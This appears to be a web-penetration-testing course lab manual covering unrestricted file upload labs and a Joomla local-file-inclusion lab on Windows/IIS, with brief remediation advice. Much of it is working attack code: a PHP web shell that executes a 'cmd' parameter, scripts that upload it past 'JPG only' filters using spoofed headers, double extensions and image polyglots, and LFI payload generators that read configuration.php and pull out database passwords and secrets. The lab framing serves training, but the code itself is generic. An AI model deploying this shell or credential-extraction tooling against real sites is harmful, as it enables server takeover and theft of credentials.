
© 2018 Caendra Inc. | Hera for WAPTv3 | File and Resource Attacks


In these File and Resource Attacks labs, the student can practice attack techniques
against web applications vulnerable to RFI, LFI, Unrestricted File Upload and more.

Once you are connected to the lab environment via VPN, all the web applications will be
available at the following URL: http://info.fileres.site.

There are three main sections for each type of lab: Video, Lab, Challenges.

• The Video section contains the web applications used during the video lessons. If
you need any information about the scenario, the attacks and so on, refer to the
corresponding video.
• The Labs section contains web applications where you can practice the techniques of
the specific module. These labs have solutions, which you can find later in this manual.
• Challenge labs do not have solutions; otherwise, why call them challenges? If you
study the course and think like a penetration tester, you will achieve the goal!

The best tool is, as usual, your brain. Then you may need:

• Web Browser
• Burp Suite

Once your virtual network is ready, configure the following IP address as your default
DNS server: 10.100.13.37

• WINDOWS: change the properties of the TAP network device, adding the IP of the
server as the first DNS server.
• LINUX: add a nameserver entry with the IP address of the server to /etc/resolv.conf

Tomato is a small website for tomato fans. They share recipes and photos of delicious
tomatoes.

The website lets users upload photos. Your objective is to determine which types of
files can be uploaded and whether they pose a threat to the security of the website. To
prove the threat, you should upload a file that lets you execute PHP code on the server.

• You will find a secret in the file readthissecret.php in the website root

• How to find and exploit vulnerable upload forms
• How to determine the impact related to an Unrestricted File Upload vulnerability
• How to write your own PHP shell

Tomato is a small website for Tomato fans. They share recipes and photos of delicious
tomatoes.

The website owner has accepted your suggestion to limit the types of files accepted
by the upload web form.

They decided to allow only JPG files. Your objective is to determine whether the security
mechanism in place has really fixed the vulnerability.

To prove that the threat is still there, you should upload a file that lets you execute
PHP code on the server.

• You will find a trophy in the file readthissecret.php in the website root

• How to find and exploit vulnerable upload forms
• How to determine the impact related to an Unrestricted File Upload vulnerability
• How to write your own PHP shell
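The two Tomato labs differ only in the filter the owner added, so one added example serves both: a minimal PHP web shell, the multipart request that delivers it (hand-built so that every header is under our control), and the upload variants that defeat a "JPG only" check. This is example code written for this manual, not the lab application's code. The form URL (tomato.fileres.site/upload.php), the field name "photo" and the shape of the owner's filter (weak_jpg_filter) are assumptions; read the real values from the form in Burp Suite.

```python
"""
Unrestricted file upload (added example): PHP web shell, multipart delivery,
and variants that bypass a "JPG only" filter.  Target URL, field name and the
filter emulation are assumptions, not the lab's real code.
"""
import urllib.request
import uuid

# The shell itself: executes the "cmd" query parameter on the server.
# system() is tried first; shell_exec()/passthru() are fallbacks because
# hardened php.ini files often list one or two of them in disable_functions.
PHP_SHELL = b"""<?php
if (isset($_GET['cmd'])) {
    $c = $_GET['cmd'];
    if (function_exists('system')) { system($c); }
    elseif (function_exists('shell_exec')) { echo shell_exec($c); }
    elseif (function_exists('passthru')) { passthru($c); }
    else { echo 'no exec function enabled'; }
}
?>"""

# JPEG files start with the SOI marker FF D8 FF; image-sniffing checks such as
# getimagesize() or finfo look at these bytes rather than at the extension.
JPEG_MAGIC = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"


def polyglot(shell: bytes = PHP_SHELL) -> bytes:
    """Image header followed by PHP.  PHP emits anything outside <?php ... ?>
    verbatim, so the junk header does not stop the shell from running once
    the file is served through the PHP handler."""
    return JPEG_MAGIC + b"\n" + shell


def weak_jpg_filter(filename: str, content_type: str) -> bool:
    """Assumed shape of the owner's 'JPG only' fix: it trusts two values the
    client controls (Content-Type header and filename) and never looks at the
    bytes or at the *last* extension."""
    return content_type == "image/jpeg" and ".jpg" in filename.lower()


def bypass_candidates(shell: bytes = PHP_SHELL) -> list:
    """(filename, content_type, body) variants, each aimed at a different weak
    check.  Try them in order and request the stored file after each one."""
    return [
        # Filter trusts Content-Type only: lie about it.
        ("shell.php", "image/jpeg", shell),
        # Filter looks for '.jpg' anywhere in the name: keep .php as the real
        # (last) extension so the web server still hands the file to PHP.
        ("shell.jpg.php", "image/jpeg", shell),
        # Filter sniffs magic bytes but keeps the client's extension.
        ("shell.jpg.php", "image/jpeg", polyglot(shell)),
    ]


def multipart_body(field: str, filename: str, content_type: str, data: bytes,
                   boundary: str = None) -> tuple:
    """Hand-built multipart/form-data body; a browser would replace the part's
    Content-Type with its own guess, which is exactly the header we spoof."""
    boundary = boundary or uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    return boundary, head + data + f"\r\n--{boundary}--\r\n".encode()


def upload(url: str, field: str, filename: str, content_type: str, data: bytes):
    """POST one candidate to the form and return (status, response body)."""
    boundary, body = multipart_body(field, filename, content_type, data)
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    # Hypothetical endpoint and field name: take the real ones from Burp.
    FORM = "http://tomato.fileres.site/upload.php"
    for name, ctype, body in bypass_candidates():
        status, _ = upload(FORM, "photo", name, ctype, body)
        print(name, ctype, "->", status)
    # Then confirm execution, e.g. GET /uploads/<name>?cmd=type+readthissecret.php
```

Two caveats when you confirm execution. Whether shell.php.jpg runs depends on the web server, not on the filter: an Apache host configured with AddHandler for .php executes any file with .php anywhere in its name, while a FilesMatch/SetHandler block only runs files whose last extension is .php, so test rather than assume. And the fix you should recommend is the opposite of the owner's: validate the last extension against a whitelist on the server, decode and re-encode the image so embedded PHP is discarded, store it under a server-generated name, and keep the upload directory outside the web root or with script execution disabled.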

Max is a webmaster who has decided to use the Joomla CMS to power his new website dealing
with soccer news and stats. He is not aware of the threats related to the use of commercial
off-the-shelf software like Joomla; however, he is not a web developer either.

So, he has hired you to assess the security of the Joomla core and of the installed third-
party add-ons through a black-box penetration test.

The most important feature to Max is the list of Scudetti won. This list appears on the
website home page, under the box named "Serie A," and shows the number of league titles
won by each Italian soccer team over time.

There is a debate in Italy about whether FC Juventus holds 27 or 29 Scudetti. What Max is
most concerned with is keeping the stats intact and preventing pranksters, criminals and
FC Juventus fans from changing this number back to 29.

As a penetration tester, you have to perform a full penetration test, starting with an
information gathering phase on Joomla to list all the installed add-ons.

Then, you will move on to find any potentially vulnerable add-on.

Finally, you will provide proof of the existence of an exploit (or of an exploitation path)
that allows an FC Juventus fan to increase the number of Scudetti in the Serie A box on the
home page. You can use any third-party exploit available on the net or build your own to
provide the proof.

• There is a secret word that will be shown to you once you increase the FC Juventus
Scudetti from 27 to 29

• Dirbuster
• Burp Suite

• How Joomla works
• How to look for exploits online
• How to bypass filters
• How local file inclusion vulnerabilities work
• Which local file inclusion vulnerabilities can be exploited on a Windows/IIS stack
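The last two points are where this lab differs from the usual Linux LFI walkthrough, so here is an added example (written for this manual, not part of the lab or of Joomla) of how a local file inclusion is driven on a Windows/IIS host running PHP: the path variants Windows accepts, a php://filter read that returns PHP source instead of executing it, and extraction of the database settings from Joomla's configuration.php. The vulnerable URL (max.fileres.site/index.php), the parameter name "file", the IIS web root C:\inetpub\wwwroot and the SAMPLE_* values are assumptions or constructed data; the vulnerable add-on and its parameter are what your information gathering has to find.

```python
"""
LFI on Windows/IIS + PHP (added example): Windows path variants, php://filter
source reads, and configuration.php parsing.  URL, parameter name, web root
and the SAMPLE_* data are assumptions/constructed, not lab output.
"""
import base64
import re
import urllib.parse
import urllib.request

# Files worth reading first on this stack.  win.ini always exists and proves
# the include escapes the web root; configuration.php holds Joomla's database
# credentials and secret.  C:\inetpub\wwwroot is IIS's default root (assumed).
TARGETS = {
    "probe": r"C:\Windows\win.ini",
    "joomla_config": r"C:\inetpub\wwwroot\configuration.php",
}


def traversal_variants(path: str, max_depth: int = 6) -> list:
    """Relative forms of an absolute Windows path.  Windows treats / and \\
    alike, so both separators are emitted; the drive letter is dropped because
    the include usually prefixes its own directory and the ../ sequence climbs
    to the drive root from there (extra ../ past the root are ignored)."""
    rel = re.sub(r"^[A-Za-z]:[\\/]", "", path)
    out = []
    for depth in range(1, max_depth + 1):
        for sep in ("/", "\\"):
            out.append(sep.join([".."] * depth) + sep + rel.replace("\\", sep))
    return out


def filter_wrapper(path: str) -> str:
    """Makes PHP return the file base64-encoded instead of executing it: the
    only way to see the source (and credentials) of a .php file through LFI."""
    return "php://filter/convert.base64-encode/resource=" + path


def payloads(path: str, max_depth: int = 6, null_byte: bool = False) -> list:
    """Absolute path first (works when the include prefixes nothing), then the
    traversals, then the same set through php://filter.  null_byte appends a
    NUL, which truncates a server-appended suffix such as ".php" only on
    PHP older than 5.3.4."""
    raw = [path] + traversal_variants(path, max_depth)
    out = raw + [filter_wrapper(p) for p in raw]
    return [p + "\x00" for p in out] if null_byte else out


def decode_filter_response(body: str):
    """Extract and decode the base64 blob the filter wrapper leaves in the page."""
    m = re.search(r"[A-Za-z0-9+/]{40,}={0,2}", body)
    if not m:
        return None
    return base64.b64decode(m.group(0)).decode("utf-8", errors="replace")


def joomla_db_settings(config_source: str) -> dict:
    """configuration.php declares e.g. `public $password = '...';`
    (Joomla 1.5 used `var $password`)."""
    found = {}
    for key in ("host", "user", "password", "db", "dbprefix", "secret"):
        m = re.search(r"(?:public|var)\s+\$%s\s*=\s*'([^']*)'" % key, config_source)
        if m:
            found[key] = m.group(1)
    return found


def fetch(url: str, param: str, payload: str) -> str:
    """GET the vulnerable page with one payload (placeholder endpoint)."""
    full = url + "?" + urllib.parse.urlencode({param: payload})
    with urllib.request.urlopen(full, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample, not lab output: what a php://filter read of
# configuration.php looks like once the application wraps it in its HTML.
SAMPLE_CONFIG = ("<?php\nclass JConfig {\n\tpublic $host = 'localhost';\n"
                 "\tpublic $user = 'joomla';\n\tpublic $password = 'S3cret!';\n"
                 "\tpublic $db = 'joomladb';\n}\n")
SAMPLE_PAGE = ("<html><body>"
               + base64.b64encode(SAMPLE_CONFIG.encode()).decode()
               + "</body></html>")


def demo() -> dict:
    """Offline run of the decode + parse step on the constructed sample."""
    return joomla_db_settings(decode_filter_response(SAMPLE_PAGE))


if __name__ == "__main__":
    URL, PARAM = "http://max.fileres.site/index.php", "file"   # placeholders
    for p in payloads(TARGETS["probe"], 4):
        if "[fonts]" in fetch(URL, PARAM, p):   # a section always in win.ini
            print("LFI confirmed with:", p)
            break
    print("sample configuration.php settings:", demo())
```

Two practical notes. The add-on enumeration the scenario asks for is a directory brute force: Joomla keeps front-end components under /components/com_<name>/ and administrator ones under /administrator/components/com_<name>/, so pointing Dirbuster at those two paths lists what is installed before you search for exploits. And on Windows the include is case-insensitive and ignores surplus ../ beyond the drive root, which is why a generous max_depth is cheap; what you cannot do on a current PHP is the %00 truncation, so if the include appends an extension, look for a file type the application accepts (an uploaded image carrying PHP, or the IIS log under C:\inetpub\logs\LogFiles\) rather than for a suffix bypass.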
